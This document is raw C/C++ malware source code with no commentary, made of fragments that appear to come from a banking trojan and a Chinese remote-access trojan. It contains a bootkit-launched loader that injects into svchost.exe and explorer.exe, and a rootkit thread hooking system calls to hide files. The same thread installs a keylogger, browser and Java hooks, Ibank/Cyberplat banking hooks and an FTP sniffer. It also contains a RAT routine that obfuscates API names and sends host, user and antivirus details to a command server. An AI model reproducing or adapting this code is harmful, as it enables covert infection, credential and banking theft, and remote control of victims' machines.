void StartBootkitDll(void* Arguments) { // If Dll loaded by original Bootkit driver we MUST wait some timeout. // This happens because by default bootkit driver call DllMain(_, DLL_PROCESS_ATTACH, _) // at all. // Waiting helps system to load all libraries in default load order. After loading all modules // we can apply GetApi for our reasons. DWORD timeout = 5 * 1000; LDRDBG("StartBootkitDll", "Sleeping %d ms.", timeout); pSleep(timeout); LDRDBG("StartBootkitDll", "Waking up after %d ms.", timeout); DebugReportInit(); // определяем в каком процессе находимся char Name[MAX_PATH]; if ((DWORD)pGetModuleFileNameA(NULL, Name, MAX_PATH) == 0) return; PCHAR ShortName = File::ExtractFileNameA(Name, false); DWORD Hash = STR::GetHash(ShortName, 0, true); LDRDBG("StartBootkitDll", "LoaderDll loaded in path='%s' pid=%u...", Name, (DWORD)pGetProcessId() ); LDRDBG("StartBootkitDll", "LoaderDll wake up and check IsLoadedByOriginalBootkit=%d", IsDllLoadedByBootkitLoader()); if (!IsDllLoadedByBootkitLoader()) { LDRDBG("StartBootkitDll", "LoaderDll is NOT loaded by Bootkit loader. Finished."); return; } LDRDBG("StartBootkitDll", "LoaderDll detects original bootkit loading."); if (Hash == 0x2608DF01 /* svchost.exe */) { LDRDBG("StartBootkitDll", "LoaderDll loaded in SVCHOST. "); StartThread(DbgRptSvchostThread, NULL); } if (Hash == 0x490A0972 /* explorer.exe */) { LDRDBG("StartBootkitDll", "LoaderDll loaded in EXPLORER. "); StartThread(DbgRptExplorerThread, NULL); LDRDBG("StartBootkitDll", "Starting loading and run plug."); StartThread(ExplorerLoadAndRunBotPlug, NULL); } LDRDBG("StartBootkitDll", "finished."); }
VOID WINAPI Start( PVOID NormalContext /*системный указатель*/, PUSER_INIT_NOTIFY SystemArgument1 /*аргумент который нужно сохранить чтоб использовать общение с драйвером*/, PVOID SystemArgument2/* ничего не передаеться*/ ) { ResetBootkitLoaderFlag(); // стартуем поток загрузки длл if (SystemArgument1 == NULL) return; // определяем в каком процессе находимся char Name[MAX_PATH]; if ((DWORD)pGetModuleFileNameA(NULL, Name, MAX_PATH) == 0) return; PCHAR ShortName = File::ExtractFileNameA(Name, false); DWORD Hash = STR::GetHash(ShortName, 0, true); LDRDBG("BRDS", "LoaderDll loaded ..."); //// 301_ld запуск вообще (тут сети может не быть) //PP_DBGRPT_FUNCTION_CALL(DebugReportStepByName("301_ld")); if (Hash == 0x2608DF01 /* svchost.exe */) { PCHAR CL = (PCHAR)pGetCommandLineA(); LDRDBG("BRDS", "Драйвер перехватил запуск процесса svchost.exe "); LDRDBG("BRDS", "Командная строка svchost.exe - %s ", CL); //if (STR::Pos(CL, "localservice", 0, false) >= 0) { DLLLoader::StartLoaderThread(SystemArgument1); } } if (Hash == 0x490A0972 /* explorer.exe */) { // LDRDBG("BRDS", "Драйвер перехватил запуск эксплорера "); StartThread(ExplorerStartProc, SystemArgument1); } };
DWORD WINAPI RootkitThread( LPVOID lpData ) { // Поток работает в заинжекченном процессе UnhookDlls(); HookZwResumeThread(); HookZwQueryDirectoryFile(); // Подготавливаем данные для события TEventData Data; ClearStruct(Data); // Определяем имя приложения PCHAR AppName = STR::Alloc(MAX_PATH); if (AppName != NULL && pGetModuleFileNameA(NULL, AppName, MAX_PATH)) Data.Application = AppName; // хук что ставиться при запуске Ibank Cyberplat как в ехе варианте так и веб #ifdef RuBnkH // if (IbankHooksMain() ) return 0; //if (HookCyberplatPCMain()) return 0; #endif if ( IsTrade() ) { return 0; } ApplicationStarted(&Data); STR::Free(AppName); return 0; }
VOID UnhookModuleExports(HMODULE hModule) { CHAR szModuleFileName[MAX_PATH]; pGetModuleFileNameA(hModule,szModuleFileName,sizeof(szModuleFileName)); PVOID pMap = MapBinary(szModuleFileName); if (pMap) { PIMAGE_NT_HEADERS pNtHeaders = (PIMAGE_NT_HEADERS)pRtlImageNtHeader(hModule); if (pNtHeaders) { DWORD dwExportsSize; //PIMAGE_NT_HEADERS pnt = (PIMAGE_NT_HEADERS)(PIMAGE_DOS_HEADER(hModule)->e_lfanew +(PCHAR)hModule); // dwExportsSize = pnt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size; /*PIMAGE_EXPORT_DIRECTORY(PCHAR(hModule) + pnt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);//*/ PIMAGE_EXPORT_DIRECTORY ExportDirectory =(PIMAGE_EXPORT_DIRECTORY)pRtlImageDirectoryEntryToData((PVOID)hModule,TRUE,IMAGE_DIRECTORY_ENTRY_EXPORT,&dwExportsSize); if (ExportDirectory && dwExportsSize) { PUSHORT Ords = (PUSHORT)((DWORD)hModule+ExportDirectory->AddressOfNameOrdinals); PULONG EntriesRva = (PULONG)((DWORD)hModule+ExportDirectory->AddressOfFunctions); PULONG Names = (PULONG)((DWORD)hModule+ExportDirectory->AddressOfNames); for (ULONG cEntry = 0; cEntry < ExportDirectory->NumberOfNames; cEntry++) { ULONG StartSize = 10; PVOID ApiStart = (PVOID)((DWORD)hModule+EntriesRva[Ords[cEntry]]); PVOID ApiOriginalStart = (PVOID)((DWORD)pMap+EntriesRva[Ords[cEntry]]); if (m_memcmp(ApiStart,ApiOriginalStart,StartSize)) { BOOL bRestore = TRUE; // DbgPrint("Hook found %s - %08x - %s ...",szModuleFileName,ApiStart,((DWORD_PTR)hModule+Names[cEntry])); if (!plstrcmpA((PCHAR)((DWORD_PTR)hModule+Names[cEntry]),"InternetGetCookieExA")) { bRestore = FALSE; } if (*(BYTE*)ApiStart == 0xE9) { PVOID Handler = (PVOID)(*(DWORD*)((DWORD)ApiStart + 1) + (DWORD)ApiStart + 5); CHAR FileName[MAX_PATH]; if (pGetMappedFileNameA(pGetCurrentProcess(),Handler,FileName,RTL_NUMBER_OF(FileName)-1)) { if (!plstrcmpA(pPathFindFileNameA(FileName),"ieframe.dll")) { // DbgPrint("Not restored.\n"); bRestore = FALSE; } } } if (bRestore) { ULONG Written; if (pWriteProcessMemory(pGetCurrentProcess(),ApiStart,ApiOriginalStart,StartSize,&Written)) { // DbgPrint("Restored.\n"); } else { // DbgPrint(__FUNCTION__"(): WriteProcessMemory failed with error %lx\n",GetLastError()); } } } } } } UnmapViewOfFile(pMap); } }
DWORD WINAPI RootkitThread( LPVOID lpData ) { // Поток работает в заинжекченном процессе UnhookDlls(); HookZwResumeThread(); HookZwQueryDirectoryFile(); // Подготавливаем данные для события TEventData Data; ClearStruct(Data); // Определяем имя приложения PCHAR AppName = STR::Alloc(MAX_PATH); if (AppName != NULL && pGetModuleFileNameA(NULL, AppName, MAX_PATH)) Data.Application = AppName; // HANDLE Thread = pGetCurrentThread(); // DWORD H = GetPidByThread(Thread); #ifdef __keylogger_h__ HookKeyLogger(); #endif #ifdef __java_h__ HookJava(); #endif #ifdef __opera_h__ if ( HookOpera() ) { return 0; } #endif #ifdef InternetExplorerH if ( HookInternetExplorer() ) { InternetExplorerStarted(&Data); BrowserStarted(&Data); STR::Free(AppName); return 0; } #endif #ifdef FireFoxH if ( HookMozillaFirefox() ) { FireFoxStarted(&Data); BrowserStarted(&Data); STR::Free(AppName); return 0; } #endif // подгрузка длл которая позволяет удаленно следить за рабочим столом #ifdef PokerH if (IsPoker()) return 0; #endif // хук что ставиться при запуске Ibank Cyberplat как в ехе варианте так и веб #ifdef RuBnkH // if (IbankHooksMain() ) return 0; if (HookCyberplatPCMain()) return 0; #endif /*if ( IsTrade() ) { return 0; }*/ FtpSniffer(); ApplicationStarted(&Data); STR::Free(AppName); return 0; }
void CSystemManager::GetSystemInfo() { MESSAGEInfo Infomsg; //获取操作系统相关信息 Infomsg.bToken = TOKEN_SYSTEMINFO; //////////////CPU Speed///////////////// DWORD dwCpu, dwBufLen; HKEY hKey; char JYvni02[] = {'H','A','R','D','W','A','R','E','\\','D','E','S','C','R','I','P','T','I','O','N','\\','S','y','s','t','e','m','\\','C','e','n','t','r','a','l','P','r','o','c','e','s','s','o','r','\\','0','\0'}; char HrFvD07[] = {'R','e','g','O','p','e','n','K','e','y','E','x','A','\0'}; RegOpenKeyExAT pRegOpenKeyExA=(RegOpenKeyExAT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),HrFvD07); pRegOpenKeyExA( HKEY_LOCAL_MACHINE, JYvni02, 0, KEY_QUERY_VALUE, &hKey ); dwBufLen = sizeof(DWORD); char HrFvD13[] = {'R','e','g','Q','u','e','r','y','V','a','l','u','e','E','x','A','\0'}; RegQueryValueExAT pRegQueryValueExA=(RegQueryValueExAT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),"RegQueryValueExA"); pRegQueryValueExA( hKey, ("~MHz"), NULL, NULL,(LPBYTE)&dwCpu, &dwBufLen); char HrFvD06[] = {'R','e','g','C','l','o','s','e','K','e','y','\0'}; RegCloseKeyT pRegCloseKey=(RegCloseKeyT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),HrFvD06); pRegCloseKey(hKey); char CtxPW50[] = {'w','s','p','r','i','n','t','f','A','\0'}; wsprintfAT pwsprintfA=(wsprintfAT)GetProcAddress(LoadLibrary("USER32.dll"),CtxPW50); pwsprintfA(Infomsg.szCpuSpeend,("~%u MHz"), dwCpu); //Get CPU Info=============================== CHAR SubKey[] = {'H','A','R','D','W','A','R','E','\\','D','E','S','C','R','I','P','T','I','O','N','\\','S','y','s','t','e','m','\\','C','e','n','t','r','a','l','P','r','o','c','e','s','s','o','r','\\','0','\0','\0'}; // CHAR SubKey[MAX_PATH]=("HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0\0"); hKey = NULL; if(pRegOpenKeyExA(HKEY_LOCAL_MACHINE,SubKey,0L,KEY_ALL_ACCESS,&hKey) == ERROR_SUCCESS) { DWORD dwType; DWORD dwSize = 128 * sizeof(TCHAR); pRegQueryValueExA(hKey,("ProcessorNameString"),NULL,&dwType,(BYTE *)Infomsg.szCpuInfo,&dwSize); pRegCloseKey(hKey); } //Get Computer & User Name======================== DWORD dwLen = sizeof(Infomsg.szPcName); char CPolQ16[] = {'G','e','t','C','o','m','p','u','t','e','r','N','a','m','e','A','\0'}; GetComputerNameAT pGetComputerNameA=(GetComputerNameAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),CPolQ16); pGetComputerNameA(Infomsg.szPcName, &dwLen); /* dwLen = sizeof(Infomsg.szUserName); GetUserName(Infomsg.szUserName,&dwLen); //获取当前用户名 */ //获取当前用户名及计算机名称 GetCurrentUserNamet(Infomsg.szUserName); //Get Screen Size================================= char DYrEN67[] = {'G','e','t','S','y','s','t','e','m','M','e','t','r','i','c','s','\0'}; GetSystemMetricsT pGetSystemMetrics=(GetSystemMetricsT)GetProcAddress(LoadLibrary("USER32.dll"),DYrEN67); pwsprintfA(Infomsg.szScrSize, ("%d * %d"), pGetSystemMetrics(SM_CXSCREEN),pGetSystemMetrics(SM_CYSCREEN)); // UINT Porst =dwPort[nConnect]; if(nConnect==0) pwsprintfA(Infomsg.LineName,"域名上线:%s",lpConnects[0]); //域名上线写入 if(nConnect==1) pwsprintfA(Infomsg.LineName,"QQ上线:%s",lpConnects[1]); //QQ上线写入 if(nConnect==2) pwsprintfA(Infomsg.LineName,"网盘上线:%s",lpConnects[2]); //网盘上线写入 pwsprintfA(Infomsg.LinePort,"%d",dwPort[nConnect]); //上线端口写入 char LCoHX03[] = {'G','e','t','M','o','d','u','l','e','F','i','l','e','N','a','m','e','A','\0'}; GetModuleFileNameAT pGetModuleFileNameA=(GetModuleFileNameAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),LCoHX03); char szbuf[256]; pGetModuleFileNameA(NULL,szbuf,MAX_PATH); //用于获取程序本身路径 pwsprintfA(Infomsg.Program,"%s",szbuf ); if(Installope==0) //绿色一次性运行 { pwsprintfA(Infomsg.InstallOpen,"%s","(绿色运行)--重启不上线!"); //上线运行方式 } else if(Installope==1) // 服务启动运行 { pwsprintfA(Infomsg.InstallOpen,"%s","(服务启动)--SYSTEM用户运行!"); //上线运行方式 } else if(Installope==2) // 直接启动运行 { pwsprintfA(Infomsg.InstallOpen,"%s","(直接启动)--当前用户运行!"); //上线运行方式 } pwsprintfA(Infomsg.szUserVirus,"%s",GetVirus()); //杀毒软件 Send((LPBYTE)&Infomsg, sizeof(MESSAGEInfo)); }